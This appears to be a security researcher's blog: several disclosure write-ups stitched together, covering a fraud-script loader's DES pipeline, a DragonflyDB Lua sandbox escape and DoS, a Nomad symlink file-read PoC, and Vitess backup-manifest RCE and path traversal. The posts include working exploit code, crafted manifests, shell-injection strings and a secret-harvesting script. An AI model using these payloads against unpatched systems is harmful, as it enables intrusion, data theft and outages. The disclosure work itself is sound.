The oldest loader, loader_39_x86_64.so, is a Cython compiled Python module, so there’s no source to read. You get a 369 KB shared object that exports exactly one symbol, PyInit_loader, and keeps everything else to itself. Import it, hand it an encrypted string, and it hands you back live code. That’s the entire product: the scripts ship as gibberish, the loader turns gibberish into behaviour, and the step in between is the thing you’re paying not to have to trust.

So I would naturally start reaching for Ghidra, or radare2 here (or binary ninja if I had more $$), but for this I didnt need to! Using file it confirmed that it was an ELF 64-bit shared object (the exported PyInit_loader symbol is what actually marks it a CPython extension module), I also used strings to get out all the printable strings, and used readelf to give a way the sections.

What gave it away was the DES. Not that it uses DES, plenty of things still do, but that it isn’t a crypto library’s DES. It’s someone’s JavaScript DES, hand-carried into Python. The fingerprints are everywhere: helper functions named to_signed32 and unsigned_right_shift, which only need to exist because JavaScript’s >>> behaves differently from Python’s. And the key schedule routine’s docstring is written in Chinese but leaves the words JavaScript and key schedule sitting right there in English; translated, it says the schedule was restored from the JavaScript version. You don’t write a DES engine in Python for fun. You port one you found.

With the algorithm identified, the rest of the pipeline falls out of the strings and the exports. The loader carries its own scrambled Base64 alphabet, the standard one shuffled just enough that an off-the-shelf decoder gives you garbage:

abcdefghijklmnoqprstuvwxyzABCDEFGHJIKLMNOPQRSTUVWXYZ0123456789~/

It’s ordinary Base64 with the case blocks flipped so lowercase comes first, p and q swapped, I and J swapped, and ~ standing in for +. Small changes, enough to break a lazy decode. From there the chain is mechanical, and every stage is one of the module’s exported names:

CustomBase64.decode → split_data (peel IV) → DES-CBC → strip PKCS7
  → gzip decompress → marshal.loads → PyEval_EvalCode

split_data lifts the IV off the front, des_crypt runs the DES-CBC with that JavaScript-ported schedule, the result un-gzips into marshalled bytecode, and PyEval_EvalCode runs it in memory. The whole thing is right there. The only piece the pipeline is missing is the key.

The MD5 red herring

The strings get you this far, and then they set a trap, or I just made my own trap.

Pull the symbols and get_key() is openly calling hashlib.md5(...).hexdigest(). A few bytes away in the read only (RO section) data sit two eight-character strings, 12345678 and 12345673, and eight characters is exactly the length of a single DES key. This is too good to be true, and this follows the idea that the creator is just doing their best. The story writes itself the key is MD5("12345678"), probably sliced to size. It’s a clean, satisfying answer, I believed this, and thought “Ah silly wool creator you have left the key right here.”

I was wrong. MD5("12345678") is 25d55ad283aa400af464c76d713c07ad, which is not the key.

The only way to figure this out was to stop reading and start running, testing my own notes, and theories. The part the static tools can’t do for you, and the part a Cython .so makes trivial. It’s a Python module, so I gave it a Python interpreter: a matching CPython (3.9, the version it was built against), the loader dropped beside it, imported. Then I just asked.

  >>> import loader
  >>> loader.get_key()
  'f30db728b353376862dcddc6c618a12b'

There’s the real DES key, truncated to its first eight bytes (f30db728) for the single DES schedule. How get_key() actually arrives at it I have no idea. But that’s the entire point: I never needed to know. The loader runs the algo itself on every call and hands back the answer, and because the whole point of this loader is to get that key, I just needed to run it!

And the key is hardcoded. The same eight bytes in every build, not created per user, not fetched from a server, just a constant the loader reads out of itself.

The embedded self-test

There is one more thing baked into the loader: a 536-character blob of that same scrambled Base64, sitting in the read-only data at offset 0x4a4c0. Run it back through the pipeline above and it decrypts cleanly into a real code object. It’s a self-test, a sample the loader can unpack against itself to prove the machinery still works, and it tells me something too. The decrypt touched no network. For this tier the loader is the whole story: key, algorithm, and a sample to run them on, all sealed in one file. Track B is where the operator decides that was the mistake.

Decryption

A note on what I am and am not publishing, because it matters here. The Track A recipe is complete: the key is hardcoded, it’s the same eight bytes for every xxwppp payload (a sister cluster of repos on the same loader), and the pipeline is seven well-known steps. Anyone who read this post could rebuild a script that decrypts every one of those fraud payloads. That is the whole problem with a hardcoded key. It buys no confidentiality at all, not against me and not against the next person.

So I’m publishing the method and the lesson, not the loaded gun. You’ve seen the algorithm, the alphabet, the pipeline, and the fact that the key is f30db728.... What I’m holding back is the copy-paste, turn-key script that takes a repo file in and prints runnable fraud code out. The method is the interesting part and the part defenders need; the turn-key tool only helps the next operator. Track B needs no such restraint, there’s nothing to hold back, because without the C2 key there is nothing to decrypt.

That tier is the next post, the one where the operator finally put the key somewhere I couldn’t reach (like a high shelf).

Resources

• Cython, for how a compiled .so can still be a Python module you import and call, as long as you match the interpreter version.
• DES, the cipher the loader runs, hand-ported out of a JavaScript implementation rather than taken from a crypto library.
• Python’s marshal and PyEval_EvalCode, the last two steps of the Track A pipeline.

• A full Lua sandbox escape in DragonflyDB, a protection-mechanism failure (CWE-693). Three lines overwrite the _G metatable and hand back rawset, rawget, string.dump, load, and the rest of what the sandbox tries to hide.
• The only thing you need is the ability to run EVAL.
• From there it chains: call registered C functions with controlled args, leak pointers via tostring, and force an out-of-bounds write (CWE-787), a reliable SIGSEGV, through a crafted-bytecode SETUPVAL index.
• Separate bug, same file: dragonfly.randstr has no size check (CWE-789). return dragonfly.randstr(1000000000) allocates gigabytes and drops the instance.
• Where it stops: no OS-level RCE. io and os aren’t loaded and nothing dangerous is registered to Lua, a deliberate call by the team, and the only reason this isn’t worse.
• Affected: everything before v1.39.0 (verified v1.34.2–v1.38.1 + main).
• Patched: v1.39.0, 9 June 2026.
• Running EVAL anywhere untrusted? Upgrade to v1.39.0, or gate EVAL/EVALSHA behind ACLs until you can.

Background

I’d been reading Dragonfly’s source on a weekend, mostly because I wanted to see how a from scratch Redis compatible server handles scripting and how I could abuse it. Redis style EVAL is one of those features that looks small from the outside and is a whole lot more intersting when you look at it more: you’re handing an attacker a real programming language and then trying to fence off the dangerous parts of it after the fact. This sort of thing is done a lot with vendored versions of databases. They often have fun things inside that can be dangerous to the owner of the server if they let a user play too much, think Postgres’s lo_import.

Dragonfly fences it with a metatable. When the interpreter spins up, InitLua loads a handful of libraries (base, table, string, math, debug, plus cjson/struct/cmsgpack/bit), and then runs a small Lua chunk it calls @enable_strict_lua to lock the global table down. That chunk is the whole sandbox for global access, and it lives in src/core/interpreter.cc around lines 386–407:

local dbg=debug
local mt = {}

setmetatable(_G, mt)
mt.__newindex = function (t, n, v)
  if dbg.getinfo(2) then
    local w = dbg.getinfo(2, "S").what
    if w ~= "main" and w ~= "C" then
      error("Script attempted to create global variable '"..tostring(n).."'", 2)
    end
  end
  rawset(t, n, v)
end
mt.__index = function (t, n)
  if dbg.getinfo(2) and dbg.getinfo(2, "S").what ~= "C" then
    error("Script attempted to access nonexistent global variable '"..tostring(n).."'", 2)
  end
  return rawget(t, n)
end
debug = nil

Take a second look at that code block… The protection is two closures on the _G metatable. __newindex stops you creating globals, __index stops you reading globals that don’t exist. After it’s set up, debug is nil’d, and elsewhere loadfile and dofile get nil’d too.

Two things never get taken away: rawset and getmetatable. And the metatable mt is a plain table sitting one getmetatable call away.

That’s the bug. The lock and the key are in the same drawer!!

The escape

getmetatable(_G) returns mt. rawset is still global. So you write straight over the two guard closures with permissive ones and because rawset bypasses metatables, the existing __newindex guard can’t even fire to stop you:

local mt = getmetatable(_G)
rawset(mt, "__newindex", function(t,n,v) rawset(t,n,v) end)
rawset(mt, "__index", function(t,n) return rawget(t,n) end)

Three lines and after that the global creation and global reads are wide open, and the functions the sandbox was relying on staying hidden are all reachable.

Here is a quick check that I ran to test it:

rawset(_G, "TEST", 123)
local bc = string.dump(function() return 1 end)
local f = load(bc, "test", "b")

string.dump gives you compiled bytecode. load(..., "b") reads compiled bytecode back. Both are right there once the guards are gone. This is the core issue (a protection mechanism failure, CWE-693) and everything below relies on this.

None of this is new code, either. That metatable approach has been Dragonfly’s Lua sandbox since the earliest public builds, and dragonfly.randstr has been around since roughly v1.15.0. So “affected” is basically every release before v1.39.0. I verified it from v1.34.2 through v1.38.1 (the latest tagged release at report time) and main, and v1.38.1 still ships the unpatched version.

What the bypass opens up

Once you’re out, a few different things open up to you. None of them is the headline (the headline is that you’re out at all), but they’re worth walking through because they’re the next reach and they map onto what got patched.

C function injection / type confusion. Functions are first class in Lua, and after the escape you have references to the registered C functions. You can park them in table slots and call them with whatever arguments you like:

T = {1, 2, 3}
T[2] = type             -- a C function, now living in a table slot
result = T[2]("hello")  -- "string"
-- same trick works with tostring, rawget, select, and other friends

On its own that’s just calling builtins. The part that matters for anyone trying to go further: tostring on a function hands back the pointer as text, so this is also a memory address leak past ASLR. Hold that thought for the Where it stops section.

Bytecode manipulation and an out of bounds write (CWE-787). With string.dump and load both reachable you can round trip bytecode through your own patcher. The Lua VM doesn’t validate the SETUPVAL index coming out of loaded bytecode, so a negative index is an out of bounds write. Easiest way to see it is to dump a closure, find the SETUPVAL instruction, and rewrite its index:

local function template()
  local x = 0xDEAD
  return function()
    x = 0x16
  end
end

local bc = string.dump(template)

-- Patch the SETUPVAL instruction to use a negative index (OOB write)
for i = 40, #bc - 4 do
  local inst = string.unpack("<I4", bc, i)
  if (inst & 0x7F) == 0x18 then
    inst = (inst & 0x7FFF) | (0xFF << 15)
    bc = bc:sub(1, i-1) .. string.pack("<I4", inst) .. bc:sub(i+4)
    break
  end
end

local f = load(bc, "oob", "b")
local inner = f()
inner()  -- writes 0x16 to memory at the upvalue[-1] location

That’s a write where it shouldn’t be, and it’ll take the process down with a SIGSEGV. It is a crash/OOB write primitive, not a controlled write to anything primitive. More on why in a moment.

Multi EVAL state persistence. Globals survive across EVAL commands on the same connection. So you don’t have to cram the whole thing into one script; you can set up the escape in one call and use it in the next:

import redis
r = redis.Redis(host='target', port=6379, password='xxx')

# EVAL 1: escape the sandbox & leave a global behind
r.eval('''
local mt = getmetatable(_G)
rawset(mt, "__newindex", function(t,n,v) rawset(t,n,v) end)
rawset(mt, "__index", function(t,n) return rawget(t,n) end)
EXPLOIT_STATE = {step = 1}
''', 0)

# EVAL 2: the global is still there
result = r.eval('return EXPLOIT_STATE.step', 0)  # 1

That’s a delivery convenience more than a bug of its own, but it changes what an attacker has to fit in a single payload, so I flagged it. Though it does not achive much at all.

Where it stops

This is the part I want to be straight up about, because it’s most of the work and none of the win.

I tried real hard to take the OOB write and the C function reach somewhere real something like a rce or anything more than what it is right now. I threw more than 4.2 billion fuzzing attempts at the SETUPVAL OOB alone over multiple nights, looking for a path from “negative index write” to controlled execution. I got crashes. Left right an centre, just crashes. I got pointer leaks out of tostring. I did not get OS level RCE, and I’m fairly confident it isn’t there from this surface.

The reason is boring and it’s the right kind of boring: io and os are never loaded into the Lua state, and nothing like popen is registered. So the type confusion / C function call trick has nothing dangerous to reach. You can call type and tostring all day yay… There just is no os.execute sitting in the registry to find. The dangerous primitives that would normally turn a Lua sandbox escape into a shell just aren’t present.

So: full sandbox escape, a memory corruption crash, an address leak, and a bloody brick wall past that, put there on purpose. Credit where it’s due. That defense in depth call is the difference between this and a much worse report.

The DoS

Different bug, same file, no escape required. dragonfly.randstr (src/core/interpreter.cc, around 467–506) reads its size argument and allocates straight away with no upper bound:

int DragonflyRandstrCommand(lua_State* state) {
  int argc = lua_gettop(state);
  lua_Integer dsize = lua_tonumber(state, 1);
  lua_remove(state, 1);

  std::string buf(dsize, ' ');
  ...

dsize comes from the script, std::string buf(dsize, ' ') tries to allocate that many bytes. One command, gigabytes requested, instance gone:

import redis
r = redis.Redis(host='target', port=6379, password='xxx', socket_timeout=5)

try:
  r.eval('return dragonfly.randstr(1000000000)', 0)
except redis.exceptions.TimeoutError:
  print("Service crashed")

That’s CWE-789, a memory allocation sized straight from an unvalidated argument. It needs EVAL and nothing else.

The fix

The fixes were already going up in the repo before I’d even had a human reply (more on the timeline below). Three PRs cover it, all landed in v1.39.0:

• PR #7370: sandbox hardening. rawset, setmetatable, and getmetatable are now overridden to block access to _G and the global library tables, and guard metatables are attached so scripts can’t replace or corrupt them across executions. This is the one that actually closes the escape: take rawset and getmetatable off the table and the three line trick has nothing to grab.
  • Worth a note: the automated review on that PR flagged that an early version of the guard still let you mutate the returned metatable’s fields directly (mt.__newindex = nil via a normal table assignment rather than rawset). Same shape as the original bug, one rung down. That’s why the shipped fix also pins guard metatables onto the global tables instead of only wrapping rawset. Good catch by whoever was reviewing.
• PR #7368: randstr validation. Argument count, type, and size are now checked (count 1–32768, size 1–16 MiB). The unbounded std::string allocation is gone.
• PR #7376: load restricted to text only. load is wrapped to force mode "t" and returns nil for any binary input regardless of the mode the caller asks for. That kills the bytecode path specifically: you can still escape into load in theory, but you can’t feed it crafted compiled bytecode anymore, so the SETUPVAL trick has no way in.

If you want the one line version: v1.39.0 takes away the keys (rawset/getmetatable), bolts the bytecode door (load text only), and bounds the allocation (randstr).

Disclosure

I emailed the Dragonfly team on 18 May with the escape, the escalations off it, and the randstr DoS, noting I’d verified everything on v1.34.2 through v1.38.1 and main at baa09014. I offered to validate a patch once they had one.

The email side was quiet. Ari Shotland picked it up on 21 May and pulled in Roman Gershman, their CTO. Roman’s reply, in full, was “Thanks for letting us know!” :)

Normally that’s the kind of response that makes you wonder if anything’s happening. It wasn’t. The patches had started going up on the 20th. PR #7368 and PR #7370 were both open a day before the first human reply, and #7376 went up on the 21st. Quiet on email, fast in the repo. I’ll take that over the reverse any day.

v1.39.0 shipped on 9 June with all three fixes folded into a big release (the Lua hardening is a few lines in a changelog that’s mostly full text search work). On 10 June I asked Roman whether the team planned to request a CVE, and whether I was clear to write this up. He said go ahead on the blog and offered to help with the CVE. That part’s still in motion. I’m working out whether to drive it through a GitHub advisory or straight through MITRE.

Timeline

• 18 May 2026: Reported the Lua sandbox escape, the escalations, and the randstr DoS to the Dragonfly team. Verified on v1.34.2–v1.38.1 and main (baa09014).
• 20 May 2026: Fixes start landing: PR #7368 (randstr validation) and PR #7370 (sandbox hardening) opened.
• 21 May 2026: Ari Shotland replied and looped in Roman Gershman (CTO). PR #7376 (load text-only) opened the same day.
• 22 May 2026: Roman acknowledged: “Thanks for letting us know!”
• 9 June 2026: v1.39.0 released, bundling all three Lua fixes.
• 10 June 2026: Confirmed with Roman that I could write this up; CVE still being sorted (GitHub advisory vs MITRE).

Appendix A: Resources

• PR #7370: Harden sandbox by protecting rawset, setmetatable, and getmetatable
• PR #7368: Add input size validation to dragonfly.randstr()
• PR #7376: Restrict load() to text only mode
• Dragonfly v1.39.0 release
• Vulnerable file: src/core/interpreter.cc (sandbox init ~386–407, dragonfly.randstr ~467–506)

• HashiCorp Nomad and Nomad Enterprise from 0.9 through 2.0.0 are vulnerable to arbitrary file read and write on the client host as the Nomad process user. CVE-2026-6959, CWE-59, CNA score 6.0 (CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:N).
• The exec2 task driver prior to 0.1.2 has the same class of bug. CVE-2026-8052, CWE-59, CNA score 6.0.
• A task container can replace the FIFO used for stdout/stderr log streaming with a symlink to any file on the host. When the task restarts, logmon reopens the FIFO path, follows the symlink, and reads or writes the target as the Nomad process user.
• The root cause is in logmon, so any driver that bind-mounts /alloc/logs writable into the task is affected. Podman is just where I found it.
• The affected range starts at Nomad 0.9 — this surface had been present for years.
• Upgrade Nomad to 2.0.1, 1.11.5, or 1.10.11. If you’re using exec2, upgrade to 0.1.2. The fix is a breaking change: /alloc/logs is now bind-mounted read-only for drivers with filesystem isolation.

The surface

After the Vitess work, I kept pulling on infrastructure stuff and ended up spending time reading through Nomad’s task driver code. I had a version of ttyd running so I could poke around from inside a deployed container. The podman driver was the most interesting thing I could see from that point, it bridges container and host, and the log streaming path has to open files on the host side based on paths the container can influence.

Nomad uses named pipes (FIFOs) for task log handling. The container and the Nomad agent share /alloc/logs. The agent opens those FIFOs to collect stdout/stderr from the running task. Two lines in the podman driver code matter here:

• driver.go#L1564 calls runLogStreaming on every task restart.
• handle.go#L151 is where the FIFO actually gets opened, without O_NOFOLLOW.

The bug

1. Task is running. FIFO exists at /alloc/logs/.sidecar.stdout.fifo.
2. Container unlinks the FIFO and replaces it with a symlink pointing at a host file.
3. Task restarts, naturally or because it crashes.
4. logmon reopens the FIFO path on the host side, follows the symlink, and is now reading from or writing to whatever the symlink points at. As the Nomad process user.

The PoC reads /nomad/data/server/raft/raft.db to show what this gets you on a real node. A raw_exec sidecar task sleeps 10 seconds and exits 1, triggering a restart on the configured delay. The attacker task (podman container) waits for the FIFO to appear, unlinks it, drops a symlink to raft.db in its place, then waits. When logmon reopens the path, it streams raft.db into the log file. The container reads it back from /alloc/logs/sidecar.stdout.

The raw_exec part is just for the PoC to have a deterministic restart cycle. You don’t need a privileged driver in practice — most real allocations include sidecars that restart naturally. Log collectors, anything with a restart policy, is a trigger.

(HashiCorp scored this C:N/I:H/A:N, so they treated it as a write primitive only. The PoC does read raft.db, but only by getting the host to write it into the alloc log file, which is a stretch of the read primitive. Fair enough.)

(Full PoC files in Appendix A.)

Disclosure

I sent the report to security@hashicorp.com on April 11 with a docker-compose reproducer attached. This is where it got entertaining…. The email filter stripped the .zip. Then stripped the renamed .txt version. Then stripped a second .txt attempt. In the end I pasted all five files inline in the email body, with a “Lets hope this gets though :)” which I stand by.

James Warren at HashiCorp picked it up on April 14. Reproduction confirmed April 16. They were working to reproduce it with constrained tasks instead of raw_exec, which confirmed they understood the driver was just a convenient stand-in for “anything that restarts.”

Then on May 8, James told me the same issue affects the exec2 task driver, which is released as a separate binary. That got CVE-2026-8052. The bulletin credits “the Nomad engineering team in conjunction with NeuroWinter” — they found that one. I hadn’t looked at exec2 specifically. Two CVEs from one investigation, the second one turned up by HashiCorp themselves.

Both bulletins went public May 13.

The fix

I’d suggested O_NOFOLLOW on the FIFO open in logmon. What shipped goes wider, in two layers (commit 2a09fd6):

1. The FIFO creation path now uses Go’s os.Root to confine filesystem operations to the logs directory, with a new mkfifoat syscall wrapper on Linux and BSD. That stops the symlink-following at the syscall layer. macOS is excluded because the syscall isn’t available there. Windows doesn’t need it because named pipes live in the kernel namespace, not the filesystem.
2. The allocation logs directory is now bind-mounted read-only for task drivers with filesystem isolation. That stops the container from unlinking the FIFO in the first place. This is the breaking change called out in the release notes.

While they were in there, the team also patched another variant: a task could replace /alloc/logs/ itself with a symlink, letting logmon create files in arbitrary host directories. I hadn’t found that one — it came out of HashiCorp’s audit after my report. Same root cause, different lever.

I’ve had a lot worse CVD experiences :)

Timeline

• 11 April 2026: Reported to security@hashicorp.com with PoC
• 14 April 2026: HashiCorp picks up the report (after a round of email-filter wrangling)
• 16 April 2026: Reproduction confirmed; fix targeted for Nomad 2.0.1
• 17 April 2026: CVE-2026-6959 to be issued; fix scope expanded to logmon
• 8 May 2026: HashiCorp finds same bug in exec2 driver; CVE-2026-8052 reserved
• 13 May 2026: Both bulletins and CVEs published; Nomad 2.0.1, 1.11.5, 1.10.11, exec2 0.1.2 released

Appendix A — PoC Files

docker-compose.yml

services:
  consul:
    image: hashicorp/consul:latest
    ports:
      - "8500:8500"
    command: "agent -dev -bind=0.0.0.0 -client=0.0.0.0"
  nomad:
    build:
      context: .
      dockerfile: Dockerfile.nomad
    ports:
      - "4646:4646"
      - "4647:4647"
      - "4648:4648"
    volumes:
      - ./nomad-config:/etc/nomad.d
      - nomad-data:/nomad/data
      - /sys/fs/cgroup:/sys/fs/cgroup:rw
    privileged: true
    cgroup: host
    devices:
      - /dev/fuse:/dev/fuse
    security_opt:
      - seccomp=unconfined
      - apparmor=unconfined
    environment:
      - NOMAD_ADDR=http://0.0.0.0:4646
    depends_on:
      - consul
volumes:
  nomad-data:

Dockerfile.nomad

FROM ubuntu:24.04
ARG NOMAD_VERSION=1.9.7
ARG PODMAN_DRIVER_VERSION=0.6.3
RUN apt-get update && apt-get install -y \
    curl \
    unzip \
    podman \
    uidmap \
    fuse-overlayfs \
    slirp4netns \
    ca-certificates \
    iproute2 \
    && rm -rf /var/lib/apt/lists/*
RUN curl -fsSL https://releases.hashicorp.com/nomad/${NOMAD_VERSION}/nomad_${NOMAD_VERSION}_linux_amd64.zip \
    -o /tmp/nomad.zip \
    && unzip /tmp/nomad.zip -d /usr/local/bin/ \
    && rm /tmp/nomad.zip
RUN mkdir -p /opt/nomad/plugins \
    && curl -fsSL https://releases.hashicorp.com/nomad-driver-podman/${PODMAN_DRIVER_VERSION}/nomad-driver-podman_${PODMAN_DRIVER_VERSION}_linux_amd64.zip \
    -o /tmp/podman-driver.zip \
    && unzip /tmp/podman-driver.zip -d /opt/nomad/plugins/ \
    && chmod +x /opt/nomad/plugins/nomad-driver-podman \
    && rm /tmp/podman-driver.zip
RUN useradd -m -u 1001 nomad \
    && echo "nomad:100000:65536" >> /etc/subuid \
    && echo "nomad:100000:65536" >> /etc/subgid
RUN mkdir -p /nomad/data /etc/nomad.d \
    && chown -R nomad:nomad /nomad
EXPOSE 4646 4647 4648
COPY entrypoint.sh /entrypoint.sh
RUN chmod +x /entrypoint.sh
CMD ["/entrypoint.sh"]

entrypoint.sh

#!/bin/bash
mkdir -p /run/user/1001/podman
chown -R nomad:nomad /run/user/1001
mkdir -p /home/nomad/.config/containers
cat <<EOF > /home/nomad/.config/containers/containers.conf
[containers]
log_driver = "k8s-file"
[engine]
cgroup_manager = "cgroupfs"
EOF
mkdir -p /nomad/data
chown -R nomad:nomad /nomad/data /home/nomad
su - nomad -c "podman system service --time=0 unix:///run/user/1001/podman/podman.sock &"
sleep 2
exec su -s /bin/bash nomad -c "nomad agent -config=/etc/nomad.d"

poc.nomad

job "poc" {
  datacenters = ["dc1"]
  type        = "service"
  group "app" {
    restart {
      attempts = 10
      interval = "10m"
      delay    = "5s"
      mode     = "delay"
    }
    task "sidecar" {
      driver = "raw_exec"
      config {
        command = "/bin/sh"
        args    = ["-c", "sleep 10; exit 1"]
      }
      resources {
        cpu    = 100
        memory = 64
      }
    }
    task "attacker" {
      driver = "podman"
      config {
        image   = "python:3.13-slim"
        command = "python3"
        args    = ["/local/poc.py"]
      }
      template {
        data        = <<EOF
import os
import time
import sys
import re
ALLOC_LOGS = "/alloc/logs"
TARGET = "/nomad/data/server/raft/raft.db"
fifo = os.path.join(ALLOC_LOGS, ".sidecar.stdout.fifo")
print(f"waiting for {fifo}", flush=True)
for i in range(30):
    if os.path.exists(fifo):
        print("found fifo", flush=True)
        break
    time.sleep(1)
try:
    os.unlink(fifo)
    os.symlink(TARGET, fifo)
    print("symlink planted", file=sys.stderr, flush=True)
except Exception as e:
    print(f"error: {e}", file=sys.stderr, flush=True)
# Wait for sidecar to restart and logmon to write raft.db into the log file
time.sleep(30)
# Read back the exfiltrated data
print("=== EXFILTRATED DATA ===", flush=True)
for logfile in sorted(os.listdir(ALLOC_LOGS)):
    if logfile.startswith("sidecar.stdout"):
        path = os.path.join(ALLOC_LOGS, logfile)
        print(f"\n--- {path} ---", flush=True)
        with open(path, "rb") as f:
            data = f.read()
        # Extract printable strings of length 8+
        strings = re.findall(rb'[\x20-\x7e]{8,}', data)
        for s in strings:
            decoded = s.decode("utf-8", errors="ignore")
            # Filter for interesting patterns
            if any(x in decoded for x in [
                "-", "nomad", "alloc", "secret", "token",
                "node", "eval", "job", "SecretID", "AuthToken",
                "dc1", "global", "192.168"
            ]):
                print(decoded, flush=True)
print("=== END EXFIL ===", flush=True)
time.sleep(30)
EOF
        destination = "local/poc.py"
      }
      resources {
        cpu    = 100
        memory = 128
      }
    }
  }
}

nomad-config/nomad.hcl

data_dir  = "/nomad/data"
bind_addr = "0.0.0.0"
plugin_dir = "/opt/nomad/plugins"
log_level = "DEBUG"
server {
  enabled          = true
  bootstrap_expect = 1
}
client {
  enabled = true
}
consul {
  address = "consul:8500"
}
plugin "nomad-driver-podman" {
  config {
    socket_path    = "unix:///run/user/1001/podman/podman.sock"
    recover_stopped = true
  }
}
plugin "raw_exec" {
  config {
    enabled = true
  }
}

Relevant Resources

• HCSEC-2026-13: Nomad exec2 task driver vulnerable to arbitrary file read/write via symlink attack
• HCSEC-2026-14: Nomad arbitrary file read/write on client host via symlink attack
• Nomad 2.0.1 release notes
• Fix commit 2a09fd6

• Two CVEs in Vitess. Both come from the backup MANIFEST file being trusted at restore time.
• CVE-2026-27965 (GHSA-8g8j-r87h-p36x)
• CVSS 8.4, CWE-78. The ExternalDecompressor field is run through /bin/sh -c. RCE as the vitess user.
• CVE-2026-27969 (GHSA-r492-hjgh-c9gw)
• CVSS 9.3, CWE-22. FileEntries[].Name path traversal. Write to any path the vitess user can write.
• Affected: v22.0.3 and older, v23.0.0–v23.0.2.
• Patched: v22.0.4, v23.0.3.
• Quick workaround for the RCE only: set --external-decompressor=cat (or any other harmless command) on vttablet/vtbackup. The flag overrides the manifest. No equivalent for the path traversal — upgrade.

Background

I started looking into how vitess was doing backups as I was recenlty looking into the differences between WAL and xlogs etc in postgres and mysql. I was interseted in the boundry that backsups cross, from production data, config files, and then cold storage, and finally how these backups are used in DR.

A Vitess backup is a directory containing a JSON MANIFEST and the data files it references. Restore reads the manifest, copies the data files out, and optionally decompresses them.

A normal one looks like this:

{
  "BackupMethod": "builtin",
  "CompressionEngine": "external",
  "ExternalDecompressor": "zstd -d",
  "FileEntries": [{"Base":"Data","Name":"backup.sql.gz.external","Hash":"..."}],
  "Keyspace": "test",
  "Shard": "0",
  "SkipCompress": false
}

Two fields end up being the bugs:

• ExternalDecompressor, a shell command.
• FileEntries[].Name, a relative path.

Both get read from the manifest and used directly. If you can write to backup storage, you can edit them.

The thing here is that backup storage looks like passive data. The MANIFEST is not. It is restore time control plane input - it picks commands, paths, compression behaviour, and file layout, its a config file. If the backup store is writable by anything other than fully trusted restore operators, the manifest is an execution surface.

CVE-2026-27965: RCE via ExternalDecompressor

From go/vt/mysqlctl/compression.go:

cmdArgs := []string{"-c", cmdStr}
cmd := exec.CommandContext(ctx, "/bin/sh", cmdArgs...)

cmdStr is the manifest field, verbatim. No allowlist, no validation.

PoC manifest:

{
  "BackupMethod": "builtin",
  "CompressionEngine": "external",
  "ExternalDecompressor": "/bin/sh -c 'id > /tmp/PWNED; echo VITESS_RCE >> /tmp/PWNED'",
  "FileEntries": [{"Base":"Data","Name":"backup.sql.gz.external","Hash":""}],
  "Keyspace": "test",
  "Shard": "0",
  "SkipCompress": false
}

Run vtbackup against it:

vitess@d438d03b8595:/$ /vt/bin/vtbackup \
  --backup-storage-implementation=file \
  --file-backup-storage-root=/vt/backups \
  --init-keyspace=test --init-shard=0 \
  --topo-implementation=etcd2 \
  --topo-global-server-address=etcd:2379 \
  --topo-global-root=/vitess/global

... "msg":"Decompressing using external command: \"/bin/sh -c 'id > /tmp/PWNED; echo VITESS_RCE >> /tmp/PWNED'\""

vitess@d438d03b8595:/$ cat /tmp/PWNED
uid=999(vitess) gid=999(vitess) groups=999(vitess)
VITESS_RCE

Code is executed as the vitess user, inside the tablet/container context. Depending on the deployment that means access to database files, MySQL credentials, topology-server connectivity, and the network the tablet sits on. The backup routine has access to SO much. Multiple tablets restoring from the same backup store means one poisoned manifest fans out across the cluster as new replicas come up.

The restore itself fails on a hash mismatch, but the decompressor runs before the hash check. And the engine retries failed file restores, so the command runs twice per attempt.

The thing worth flagging: I had no --external-decompressor flag set. No --compression-engine-name=external, no compression flags at all. Default compression engine is pargzip. The restore engine consults the flag first; if it is empty it falls back to whatever is in the manifest. The manifest sets CompressionEngine: "external" and that is enough.

Default Vitess is exposed. The operator does not have to know external compressors exist — the manifest names one and the code follows.

The fix in PR #19460 makes the manifest fallback opt-in via --external-decompressor-allow-manifest. Default is to ignore the field.

CVE-2026-27969: Path traversal via FileEntries[].Name

The restore engine joins FileEntries[i].Name onto the destination data dir with no normalisation.

PoC manifest:

{
  "BackupMethod": "builtin",
  "CompressionEngine": "",
  "SkipCompress": true,
  "FileEntries": [{
      "Base": "Data",
      "Name": "../../../../tmp/OhNo.txt",
      "Hash": ""
  }],
  "Keyspace": "test",
  "Shard": "0"
}

Same vtbackup invocation:

vitess@6d4bc6844b03:/$ ls /tmp/
OhNo.txt

/tmp/OhNo.txt exists, outside the data directory, written wherever the vitess user can write. Empty contents — I did not bother computing the right hash for the source, but in theory I could have and then there might be no error. I guess I was just being lazy, and excited with what I had already found :P

go/os2/file.go:

func Create(name string) (*os.File, error) {
  return OpenFile(name, os.O_RDWR|os.O_CREATE|os.O_TRUNC, PermFile)
}

O_TRUNC happens before the hash check. So even with a wrong hash, the target file gets created and truncated to zero bytes. Point a malicious manifest at every config or auth file you can guess and the box is bricked. With the right hash you get full write — ~/.ssh/authorized_keys for the vitess user being a killer target, or any other fun files.

No flag based workaround for this one. The fix in PR #19470 clamps the destination to the data directory. Upgrade.

Both bugs, one file

Both bugs sit at the same boundary: MANIFEST fields treated as trusted at restore time. Once a string from that file reaches exec.Command or a path join, the rest is mechanics.

Timeline

• 20 Feb 2026: Reported RCE to cncf-vitess-maintainers@lists.cncf.io.
• 23 Feb 2026: Triage started.
• 24 Feb 2026: Fix for RCE drafted. Reported path traversal
• 25 Feb 2026: Public bug #19459 opened. RCE advisory drafted.
• 26 Feb 2026: Path traversal advisory drafted. CVSS and CWE finalised.
• 27 Feb 2026: Both advisories published. v22.0.4 and v23.0.3 released.

7 days from initial email to two published advisories with backports to v22 and v23. Fast turnaround for a CNCF project — the Vitess maintainers deserve credit for it.

Appendix A: Resources

• GHSA-8g8j-r87h-p36x: Vitess remote code execution via untrusted ExternalDecompressor
• GHSA-r492-hjgh-c9gw: Vitess arbitrary file write via path traversal in backup MANIFEST
• PR #19460: Do not trust manifest-supplied external decompressor by default
• PR #19470: Clamp restore file paths to the destination data directory
• Vitess backup and restore documentation

World 1: Why I Bought a Pile of Dead POS Terminals

So after getting my first CVE and posting about it here and here, I decided it was time to hunt for more drivers. Scouring online for drivers got annoying, as it felt like some of them were just hidden. I just didn’t know where to find them, nor what sort of drivers I should be looking for. This led me to look for used systems with disks, as if the drivers were used in a live environment, I knew I at least had some real drivers and that hunting for CVEs in them would be fun.

I managed to buy a range of dusty boxes off a local auction site from a recent liquidation, one man’s trash could be my treasure:

• 3x Digipos Retail Active 8000-Q67
• 4x AURES J2 480L

